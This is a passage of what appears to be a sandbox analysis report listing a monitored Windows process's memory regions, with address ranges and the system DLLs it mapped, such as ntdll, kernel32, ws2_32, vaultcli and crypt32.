region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 459 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 460 start_va = 0x7fff0000 end_va = 0x7ff884cbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 461 start_va = 0x7ff884cc0000 end_va = 0x7ff884e80fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 462 start_va = 0x7ff884e81000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff884e81000" filename = "" Region: id = 465 start_va = 0x400000 end_va = 0x4a1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 480 start_va = 0x510000 end_va = 0x51ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 481 start_va = 0x5f960000 end_va = 0x5f9affff monitored = 0 entry_point = 0x5f978180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 482 start_va = 0x5f9b0000 end_va = 0x5fa29fff monitored = 0 entry_point = 0x5f9c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 483 start_va = 0x76410000 end_va = 0x764effff monitored = 0 entry_point = 0x76423980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 484 start_va = 0x5fa30000 end_va = 0x5fa37fff monitored = 0 entry_point = 0x5fa317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 485 start_va = 0x520000 end_va = 0x78ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 486 start_va = 0x76410000 end_va = 0x764effff monitored = 0 entry_point = 0x76423980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 487 start_va = 0x77270000 end_va = 0x773edfff monitored = 0 entry_point = 0x77321b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 488 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 489 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 490 start_va = 0x520000 end_va = 0x5ddfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 491 start_va = 0x690000 end_va = 0x78ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 492 start_va = 0x76c90000 end_va = 0x76ceefff monitored = 0 entry_point = 0x76c94af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 493 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 494 start_va = 0x758e0000 end_va = 0x75923fff monitored = 0 entry_point = 0x758f9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 495 start_va = 0x76630000 end_va = 0x766dcfff monitored = 0 entry_point = 0x76644f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 496 start_va = 0x74190000 end_va = 0x741adfff monitored = 0 entry_point = 0x7419b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 497 start_va = 0x74180000 end_va = 0x74189fff monitored = 0 entry_point = 0x74182a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 498 start_va = 0x75880000 end_va = 0x758d7fff monitored = 0 entry_point = 0x758c25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 499 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 500 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 501 start_va = 0x767c0000 end_va = 0x768aafff monitored = 0 entry_point = 0x767fd650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 502 start_va = 0x769b0000 end_va = 0x76b6cfff monitored = 0 entry_point = 0x76a92a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 503 start_va = 0x76570000 end_va = 0x7662dfff monitored = 0 entry_point = 0x765a5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 504 start_va = 0x76d80000 end_va = 0x76ecefff monitored = 0 entry_point = 0x76e36820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 505 start_va = 0x755e0000 end_va = 0x75726fff monitored = 0 entry_point = 0x755f1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 506 start_va = 0x76bf0000 end_va = 0x76c81fff monitored = 0 entry_point = 0x76c28cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 507 start_va = 0x890000 end_va = 0x9affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000890000" filename = "" Region: id = 508 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 509 start_va = 0x9b0000 end_va = 0xb37fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009b0000" filename = "" Region: id = 510 start_va = 0x764f0000 end_va = 0x7651afff monitored = 0 entry_point = 0x764f5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 511 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 512 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 513 start_va = 0xb40000 end_va = 0xcc0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b40000" filename = "" Region: id = 514 start_va = 0xcd0000 end_va = 0x20cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000cd0000" filename = "" Region: id = 515 start_va = 0x741b0000 end_va = 0x755aefff monitored = 0 entry_point = 0x7436b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 516 start_va = 0x75940000 end_va = 0x75976fff monitored = 0 entry_point = 0x75943b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 517 start_va = 0x75f10000 end_va = 0x76408fff monitored = 0 entry_point = 0x76117610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 518 start_va = 0x76b70000 end_va = 0x76beafff monitored = 0 entry_point = 0x76b8e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 519 start_va = 0x76ed0000 end_va = 0x76f14fff monitored = 0 entry_point = 0x76eede90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 520 start_va = 0x755d0000 end_va = 0x755dbfff monitored = 0 entry_point = 0x755d3930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 521 start_va = 0x76cf0000 end_va = 0x76d7cfff monitored = 0 entry_point = 0x76d39b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 522 start_va = 0x766e0000 end_va = 0x76723fff monitored = 0 entry_point = 0x766e7410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 523 start_va = 0x77450000 end_va = 0x7745efff monitored = 0 entry_point = 0x77452e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 524 start_va = 0x70040000 end_va = 0x70052fff monitored = 0 entry_point = 0x70049950 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 525 start_va = 0x70010000 end_va = 0x7003efff monitored = 0 entry_point = 0x700295e0 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 526 start_va = 0x73e30000 end_va = 0x73e4afff monitored = 0 entry_point = 0x73e39050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 527 start_va = 0x20d0000 end_va = 0x2406fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 528 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 529 start_va = 0x6cf10000 end_va = 0x6cf49fff monitored = 0 entry_point = 0x6cf29be0 region_type = mapped_file name = "vaultcli.dll" filename = "\\Windows\\SysWOW64\\vaultcli.dll" (normalized: "c:\\windows\\syswow64\\vaultcli.dll") Region: id = 530 start_va = 0x73d60000 end_va = 0x73e27fff monitored = 0 entry_point = 0x73dcae90 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\SysWOW64\\WinTypes.dll" (normalized: "c:\\windows\\syswow64\\wintypes.dll") Region: id = 531 start_va = 0x75d90000 end_va = 0x75f07fff monitored = 0 entry_point = 0x75de8a90 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 532 start_va = 0x755c0000 end_va = 0x755cdfff monitored = 0 entry_point = 0x755c5410 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 533 start_va = 0x70060000 end_va = 0x70067fff monitored = 0 entry_point = 0x70061d70 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\SysWOW64\\dpapi.dll" (normalized: "c:\\windows\\syswow64\\dpapi.dll") Region: id = 534 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 535 start_va = 0x5e0000 end_va = 0x688fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 536 start_va = 0x76540000 end_va = 0x76552fff monitored = 0 entry_point = 0x76541d20 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 537 start_va = 0x6c7e0000 end_va = 0x6c7f4fff monitored = 0 entry_point = 0x6c7e5210 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\SysWOW64\\samcli.dll" (normalized: "c:\\windows\\syswow64\\samcli.dll") Region: id = 538 start_va = 0x6c7c0000 end_va = 0x6c7d2fff monitored = 0 entry_point = 0x6c7c5c60 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\SysWOW64\\samlib.dll" (normalized: "c:\\windows\\syswow64\\samlib.dll") Region: id = 539 start_va = 0x70220000 end_va = 0x70238fff monitored = 0 entry_point = 0x702247e0 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 540 start_va = 0x71c70000 end_va = 0x71cbefff monitored = 0 entry_point = 0x71c7d850 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 541 start_va = 0x4f0000 end_va = 0x4f1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 542 start_va = 0x1f0000 end_va = 0x1f2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 543 start_va = 0x71be0000 end_va = 0x71c63fff monitored = 0 entry_point = 0x71c06530 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 544 start_va = 0x76560000 end_va = 0x76566fff monitored = 0 entry_point = 0x76561e10 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 545 start_va = 0x71b10000 end_va = 0x71b17fff monitored = 0 entry_point = 0x71b11920 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll") Region: id = 546 start_va = 0x5e0000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 547 start_va = 0x890000 end_va = 0x98ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000890000" filename = "" Region: id = 548 start_va = 0x9a0000 end_va = 0x9affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009a0000" filename = "" Region: id = 549 start_va = 0x5e0000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 550 start_va = 0x890000 end_va = 0x98ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000890000" filename = "" Region: id = 551 start_va = 0x5e0000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 552 start_va = 0x890000 end_va = 0x98ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000890000" filename = "" Region: id = 553 start_va = 0x5e0000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 554 start_va = 0x890000 end_va = 0x98ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000890000" filename = "" Region: id = 555 start_va = 0x5e0000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 556 start_va = 0x890000 end_va = 0x98ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000890000" filename = "" Region: id = 557 start_va = 0x5e0000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 558 start_va = 0x890000 end_va = 0x98ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000890000" filename = "" Region: id = 559 start_va = 0x5e0000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 560 start_va = 0x890000 end_va = 0x98ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000890000" filename = "" Region: id = 561 start_va = 0x5e0000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 562 start_va = 0x890000 end_va = 0x98ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000890000" filename = "" Region: id = 563 start_va = 0x5e0000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 564 start_va = 0x890000 end_va = 0x98ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000890000" filename = "" Region: id = 565 start_va = 0x5e0000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 566 start_va = 0x890000 end_va = 0x98ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000890000" filename = "" Region: id = 567 start_va = 0x5e0000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 568 start_va = 0x890000 end_va = 0x98ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000890000" filename = "" Region: id = 569 start_va = 0x5e0000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 570 start_va = 0x890000 end_va = 0x98ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000890000" filename = "" Region: id = 571 start_va = 0x5e0000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 572 start_va = 0x890000 end_va = 0x98ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000890000" filename = "" Region: id = 573 start_va = 0x5e0000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 574 start_va = 0x890000 end_va = 0x98ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000890000" filename = "" Region: id = 575 start_va = 0x5e0000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 576 start_va = 0x890000 end_va = 0x98ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000890000" filename = "" Region: id = 577 start_va = 0x620000 end_va = 0x65ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 578 start_va = 0x2410000 end_va = 0x250ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002410000" filename = "" Region: id = 579 start_va = 0x5e0000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 580 start_va = 0x890000 end_va = 0x98ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000890000" filename = "" Region: id = 581 start_va = 0x2510000 end_va = 0x254ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002510000" filename = "" Region: id = 582 start_va = 0x2550000 end_va = 0x264ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002550000" filename = "" Region: id = 583 start_va = 0x2510000 end_va = 0x254ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002510000" filename = "" Region: id = 584 start_va = 0x2550000 end_va = 0x264ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002550000" filename = "" Region: id = 585 start_va = 0x2510000 end_va = 0x254ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002510000" filename = "" Region: id = 586 start_va = 0x2550000 end_va = 0x264ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002550000" filename = "" Region: id = 587 start_va = 0x2510000 end_va = 0x254ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002510000" filename = "" Region: id = 588 start_va = 0x2550000 end_va = 0x264ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002550000" filename = "" Region: id = 589 start_va = 0x2510000 end_va = 0x254ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002510000" filename = "" Region: id = 590 start_va = 0x2550000 end_va = 0x264ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002550000" filename = "" Region: id = 591 start_va = 0x2510000 end_va = 0x254ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002510000" filename = "" Region: id = 592 start_va = 0x2550000 end_va = 0x264ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002550000" filename = "" Region: id = 593 start_va = 0x2510000 end_va = 0x254ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002510000" filename = "" Region: id = 594 start_va = 0x2550000 end_va = 0x264ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002550000" filename = "" Region: id = 595 start_va = 0x2510000 end_va = 0x254ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002510000" filename = "" Region: id = 596 start_va = 0x2550000 end_va = 0x264ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002550000" filename = "" Region: id = 597 start_va = 0x2510000 end_va = 0x254ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002510000" filename = "" Region: id = 598 start_va = 0x2550000 end_va = 0x264ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002550000" filename = "" Region: id = 599 start_va = 0x2510000 end_va = 0x254ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002510000" filename = "" Region: id = 600 start_va = 0x2550000 end_va = 0x264ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002550000" filename = "" Region: id = 601 start_va = 0x2510000 end_va = 0x254ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002510000" filename = "" Region: id = 602 start_va = 0x2550000 end_va = 0x264ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002550000" filename = "" Region: id = 603 start_va = 0x2510000 end_va = 0x254ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002510000" filename = "" Region: id = 604 start_va = 0x2550000 end_va = 0x264ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002550000" filename = "" Region: id = 605 start_va = 0x2510000 end_va = 0x254ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002510000" filename = "" Region: id = 606 start_va = 0x2550000 end_va = 0x264ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002550000" filename = "" Region: id = 607 start_va = 0x2510000 end_va = 0x254ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002510000" filename = "" Region: id = 608 start_va = 0x2550000 end_va = 0x264ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002550000" filename = "" Region: id = 609 start_va = 0x2510000 end_va = 0x254ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002510000" filename = "" Region: id = 610 start_va = 0x2550000 end_va = 0x264ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002550000" filename = "" Region: id = 611 start_va = 0x2510000 end_va = 0x254ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002510000" filename = "" Region: id = 612 start_va = 0x2550000 end_va = 0x264ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002550000" filename = "" Region: id = 613 start_va = 0x2510000 end_va = 0x254ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002510000" filename = "" Region: id = 614 start_va = 0x2550000 end_va = 0x264ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002550000" filename = "" Region: id = 615 start_va = 0x2510000 end_va = 0x254ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002510000" filename = "" Region: id = 616 start_va = 0x2550000 end_va = 0x264ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002550000" filename = "" Region: id = 617 start_va = 0x2510000 end_va = 0x254ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002510000" filename = "" Region: id = 618 start_va = 0x2550000 end_va = 0x264ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002550000" filename = "" Region: id = 619 start_va = 0x2510000 end_va = 0x254ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002510000" filename = "" Region: id = 620 start_va = 0x2550000 end_va = 0x264ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002550000" filename = "" Region: id = 621 start_va = 0x2510000 end_va = 0x254ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002510000" filename = "" Region: id = 622 start_va = 0x2550000 end_va = 0x264ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002550000" filename = "" Region: id = 623 start_va = 0x2510000 end_va = 0x254ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002510000" filename = "" Region: id = 624 start_va = 0x2550000 end_va = 0x264ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002550000" filename = "" Region: id = 625 start_va = 0x2510000 end_va = 0x254ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002510000" filename = "" Region: id = 626 start_va = 0x2550000 end_va = 0x264ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002550000" filename = "" Region: id = 627 start_va = 0x2510000 end_va = 0x254ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002510000" filename = "" Region: id = 628 start_va = 0x2550000 end_va = 0x264ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002550000" filename = "" Region: id = 629 start_va = 0x2510000 end_va = 0x254ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002510000" filename = "" Region: id = 630 start_va = 0x2550000 end_va = 0x264ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002550000" filename = "" Region: id = 631 start_va = 0x2510000 end_va = 0x254ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002510000" filename = "" Region: id = 632 start_va = 0x2550000 end_va = 0x264ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002550000" filename = "" Region: id = 633 start_va = 0x2510000 end_va = 0x254ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002510000" filename = "" Region: id = 634 start_va = 0x2550000 end_va = 0x264ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002550000" filename = "" Region: id = 635 start_va = 0x2510000 end_va = 0x254ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002510000" filename = "" Region: id = 636 start_va = 0x2550000 end_va = 0x264ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002550000" filename = "" Region: id = 637 start_va = 0x2510000 end_va = 0x254ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002510000" filename = "" Region: id = 638 start_va = 0x2550000 end_va = 0x264ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002550000" filename = "" Region: id = 639 start_va = 0x2510000 end_va = 0x254ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002510000" filename = "" Region: id = 640 start_va = 0x2550000 end_va = 0x264ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002550000" filename = "" Region: id = 641 start_va = 0x2510000 end_va = 0x254ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002510000" filename = "" Region: id = 642 start_va = 0x2550000 end_va = 0x264ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002550000" filename = "" Region: id = 643 start_va = 0x2510000 end_va = 0x254ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002510000" filename = "" Region: id = 644 start_va = 0x2550000 end_va = 0x264ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002550000" filename = "" Region: id = 645 start_va = 0x2510000 end_va = 0x254ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002510000" filename = "" Region: id = 646 start_va = 